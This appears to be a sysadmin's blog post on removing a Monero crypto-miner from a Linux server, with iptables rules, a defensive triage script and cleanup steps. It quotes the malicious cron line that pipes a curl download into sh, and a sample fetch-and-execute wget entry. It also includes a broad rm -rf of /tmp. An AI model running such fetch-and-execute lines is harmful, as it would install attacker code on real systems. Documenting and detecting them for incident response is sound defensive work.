Recently I needed to check the performance of a Linux server.
A very strange job kept starting over and over again, no matter how many times I killed it, and it was consuming a high percentage of CPU.
After running several commands to track down the origin of this job, I found the following: a crypto-miner malware had infected the system.
"The malware specializes in mining the relatively new cryptocurrency Monero (XMR). It is not only a new currency with little difficulty, but the attackers chose it for some reason.
The malware checks the version of the system and adds the appropriate executable file to AutoRun.
stratum+tcp://monero.crypto-pool.fr:3333"
More detail here:
https://steemit.com/steemit/@whitemike313/crypto-miner-has-infected-thousands-of-nas-in-the-world
Well, these are the steps I took to get rid of this malware:
1.- Block all communication to their servers.
sudo chkconfig iptables on
sudo iptables -A INPUT -s xmr.crypto-pool.fr -j DROP
sudo iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP
sudo iptables -A INPUT -s txrdr.com -j DROP
sudo iptables -A OUTPUT -d txrdr.com -j DROP
sudo service iptables save
sudo service iptables status
txrdr.com is the host I found in the cron file (see step 3). Two things to keep in mind: iptables resolves a hostname only once, when the rule is added, so if the attacker moves the domain to a new address the rule no longer matches; and a miner only ever connects outbound, so the OUTPUT rules are the ones doing the work. Check which pool your copy of the miner actually talks to (look for a stratum+tcp:// URL in the process's command line or its config file) before deciding which hosts to block.
2.- Delete the malware's files in /tmp
cd /tmp
ls -la                       # look first: note the miner binary and any config next to it
sudo rm -rf ./.[!.]* ./..?* ./*
The rm line removes the hidden files (where the miner hid) and everything else in /tmp. Wiping /tmp on a server in use can break running applications that keep sockets or lock files there; if you can, remove only the miner's own files, and copy them somewhere safe first if you want to look at them later.
3.- Delete the oracle user's cron file
/var/spool/cron/oracle
Or remove its contents.
In my case it contained: (*/1 * * * * curl txrdr.com/sitecontent/S6-WEB.jpg|sh;)
That line runs every minute, downloads a shell script disguised as a JPEG and pipes it straight into sh, which is why the miner kept coming back after I killed it. Check the other users' crontabs in /var/spool/cron, plus /etc/crontab and /etc/cron.d, for the same kind of entry.
4.- Reboot as many times as you need to confirm that the process no longer starts.
5.- Check whether you actually need cron running; if not, stop it with /etc/init.d/crond stop.
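As an added example (my own helper, not commands from the original post), here is a small script that automates the triage behind steps 1 and 3: it sweeps the usual crontab locations for entries that download a URL and pipe it into a shell, extracts the hosts they contact, and prints the iptables commands to block them instead of running anything itself. The sample crontab tree it builds is constructed for the demo (the oracle entry is the one from this post, the other two are made up); the paths it scans, the function names and the assumption that the fetch command is curl or wget are mine.

```shell
#!/bin/sh
# Added triage helper, not the original post's commands. Sweeps the usual
# cron locations for "fetch a URL and pipe it into a shell" entries like the
# one in /var/spool/cron/oracle, lists the hosts they contact and prints the
# iptables commands that would block them. It changes nothing itself: review
# the output, then run the printed commands as root.
# Assumptions (mine): crontabs live under the given root in var/spool/cron,
# etc/crontab and etc/cron.d, and the fetch command is curl or wget.

FETCH_EXEC_RE='(curl|wget)[^|]*\|[[:space:]]*(ba)?sh'

# Every crontab file below the root prefix ($1; "/" on a live system).
cron_files() {
    root=${1%/}
    find "$root/var/spool/cron" "$root/etc/cron.d" "$root/etc/crontab" \
         -type f 2>/dev/null
}

# Cron lines that pipe curl/wget output into sh or bash, prefixed by file.
find_fetch_exec() {
    cron_files "$1" | while read -r f; do
        grep -HE "$FETCH_EXEC_RE" "$f" || true
    done
}

# Hosts those lines contact: drop everything up to the fetch command and
# its short options, strip the URL scheme, keep the host part only.
extract_hosts() {
    find_fetch_exec "$1" \
      | sed -E 's/.*(curl|wget)[[:space:]]+//' \
      | sed -E 's/^(-[A-Za-z-]*[[:space:]]+)*//; s#^https?://##; s#[/:[:space:]|].*##' \
      | sort -u
}

# iptables commands for those hosts. A miner only calls out, so OUTPUT is the
# chain that matters; a hostname is resolved once, when the rule is inserted,
# so re-check the rule if the attacker moves the domain to a new address.
block_cmds() {
    extract_hosts "$1" | while read -r host; do
        case $host in
            *[!0-9.]*) echo "iptables -I OUTPUT -d $host -j DROP  # resolved once, at insert time" ;;
            *)         echo "iptables -I OUTPUT -d $host -j DROP" ;;
        esac
    done
}

# Constructed sample tree so the script runs offline: the oracle entry is the
# one from this post, the other two are made up. Running with no argument
# scans this tree; "sh triage.sh /" scans the live system.
make_sample() {
    d=$(mktemp -d)
    mkdir -p "$d/var/spool/cron" "$d/etc/cron.d"
    printf '%s\n' '*/1 * * * * curl txrdr.com/sitecontent/S6-WEB.jpg|sh;' > "$d/var/spool/cron/oracle"
    printf '%s\n' '0 3 * * * /usr/local/bin/backup.sh' > "$d/var/spool/cron/root"
    printf '%s\n' '*/5 * * * * root wget -q -O - http://203.0.113.7:8080/p.sh | bash' > "$d/etc/cron.d/update"
    echo "$d"
}

root=${1:-$(make_sample)}
echo "== fetch-and-execute cron entries under $root"
find_fetch_exec "$root"
echo "== block commands (review, then run as root)"
block_cmds "$root"
```

On the sample tree the benign root crontab is ignored, the oracle entry and the cron.d entry are reported, and two OUTPUT rules are printed, one for txrdr.com (flagged as resolved only at insert time) and one for the literal address. Running it against / on the infected box gives you the list of hosts to block and the crontab lines to delete in one pass.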
This procedure does not clean the system completely, but it blocks all communication with the attackers' servers and stops the cron job from regenerating the malware, so the miner will not start if the connection cannot be established. Since the malware also installs an autostart entry (as the description above says), and whoever wrote the oracle user's crontab may have changed other things, the only reliable fix is to rebuild the server from a known-good image, rotate the oracle account's credentials, and work out how that crontab got written in the first place.
Well done bad guys!!